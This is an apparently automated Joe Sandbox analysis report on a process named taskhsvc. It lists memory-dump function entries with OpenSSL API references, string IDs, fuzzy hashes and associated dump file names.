                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_d2iN1_item_free__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 1934435860-0
                                                            • Opcode ID: 0363b450710ee5575563364c4508b28dc19074f2664c08c8003c20dfe71cc6c9
                                                            • Instruction ID: 957ab88a4667af11188d3ffbd13496184c0287150233855d1bda03a26f7c1f51
                                                            • Opcode Fuzzy Hash: 0363b450710ee5575563364c4508b28dc19074f2664c08c8003c20dfe71cc6c9
                                                            • Instruction Fuzzy Hash: DF31D2715197419FCB50EF79D281A4FBBF0AB89318F46991CE9A48BB00D330E9098F86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE6E480 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 154COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CRYPTO_malloc.LIBEAY32 ref: 6CE6E4BA
                                                            • CRYPTO_free.LIBEAY32 ref: 6CE6E51C
                                                            • ERR_put_error.LIBEAY32 ref: 6CE6E684
                                                              • Part of subcall function 6CE6D8A0: CRYPTO_malloc.LIBEAY32 ref: 6CE6DDA6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_malloc$O_freeR_put_error
                                                            • String ID: A$q
                                                            • API String ID: 2956623789-1492360937
                                                            • Opcode ID: f5ba127260339648af487becce5b37c71c4716259173f1b225d0de51c9c5b530
                                                            • Instruction ID: a232216d1e29142bab53bac1434c023888534cbe06af756eaaef4bcd8fe96b0f
                                                            • Opcode Fuzzy Hash: f5ba127260339648af487becce5b37c71c4716259173f1b225d0de51c9c5b530
                                                            • Instruction Fuzzy Hash: BD51E7746557019FD340CF2AC58070AFBF0BB89308F65895DE8588BB91E375E841CF82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEE2E40 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 133COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: D_bytes__stack_chk_fail
                                                            • String ID: o$|
                                                            • API String ID: 3403545890-345082302
                                                            • Opcode ID: 19844a76f7648d624ebace6091bfc96604cdebc00797f5ec35ec40902fec4769
                                                            • Instruction ID: 1d1f7b089ca65511db7978bb6a99a5a09b9c29c31f8f7dfb81e410dc5136a446
                                                            • Opcode Fuzzy Hash: 19844a76f7648d624ebace6091bfc96604cdebc00797f5ec35ec40902fec4769
                                                            • Instruction Fuzzy Hash: 0C518E712097458BEB00DF29C58471BBBF1BF89348F25C91CE9988B790C775D905CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE8CE00 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: B-163
                                                            • API String ID: 0-2771186707
                                                            • Opcode ID: 8aab9bc6e39a3777a3a9d39ffefac88a2ff0f7eebd785e0e89826ff4ce7b3f63
                                                            • Instruction ID: 9757fdaf214a5eda0a5d69491cd5c8314fe8170f3fffd87236d79849f564e140
                                                            • Opcode Fuzzy Hash: 8aab9bc6e39a3777a3a9d39ffefac88a2ff0f7eebd785e0e89826ff4ce7b3f63
                                                            • Instruction Fuzzy Hash: 5A4174317676418BFB10AA2DD14072F72F2EB8730CF31862AE96CA7F54D238D9814792
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEF8550 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 130stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: strlen
                                                            • String ID: d$k$q
                                                            • API String ID: 39653677-396925492
                                                            • Opcode ID: 12f3a688ec49e5a0fc3fe4d6718e079b7ae96297bd374da59cd160eb719bbc49
                                                            • Instruction ID: f348e924a300ada2b61b3aa29605d1a37c0b6ffa4fa27e1876143fb6aa1aeb4d
                                                            • Opcode Fuzzy Hash: 12f3a688ec49e5a0fc3fe4d6718e079b7ae96297bd374da59cd160eb719bbc49
                                                            • Instruction Fuzzy Hash: 28514A706093418FD764CF2AC08075BBBF1EF86708F65591EE4A88BB40D775D90ACB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF5ECE0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • BIO_new_fp.LIBEAY32 ref: 6CF5ED04
                                                              • Part of subcall function 6CEC87E0: BIO_new.LIBEAY32 ref: 6CEC8800
                                                              • Part of subcall function 6CEC87E0: BIO_set_flags.LIBEAY32 ref: 6CEC8816
                                                              • Part of subcall function 6CEC87E0: BIO_ctrl.LIBEAY32 ref: 6CEC882E
                                                            • BIO_free.LIBEAY32 ref: 6CF5ED39
                                                            • ERR_put_error.LIBEAY32 ref: 6CF5ED87
                                                            • NCONF_default.LIBEAY32 ref: 6CF5ED90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: F_defaultO_ctrlO_freeO_newO_new_fpO_set_flagsR_put_error
                                                            • String ID: h
                                                            • API String ID: 2099222323-2439710439
                                                            • Opcode ID: 9f73381f2748f70a2014abfce6703a026dfd114b4cb58bf37dfc00a42e7f8bad
                                                            • Instruction ID: 9310cabf5e55d3f95505e37c135bebfce7e598d1f39264c2b14990cc6f25e94c
                                                            • Opcode Fuzzy Hash: 9f73381f2748f70a2014abfce6703a026dfd114b4cb58bf37dfc00a42e7f8bad
                                                            • Instruction Fuzzy Hash: F93124726183009FDB10DF29D584A4BBBF4FB99318F42891DEAA497700D334E955CBD2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF364C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 81COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Y_cmp
                                                            • String ID: s
                                                            • API String ID: 2861061372-453955339
                                                            • Opcode ID: c00a72968cb27be93f70c87893172caa1cf1d3614eaedb6d9d15542db10fe30c
                                                            • Instruction ID: 2e920003a4e2475430470b0bba7d344b31dc63fa60a0b596012193245cdc57f8
                                                            • Opcode Fuzzy Hash: c00a72968cb27be93f70c87893172caa1cf1d3614eaedb6d9d15542db10fe30c
                                                            • Instruction Fuzzy Hash: C3311CB2609321ABD7409F24C15030BBBF0BB45358F12AA2DE4988BB95C7B9D944CBD2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEF6F60 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
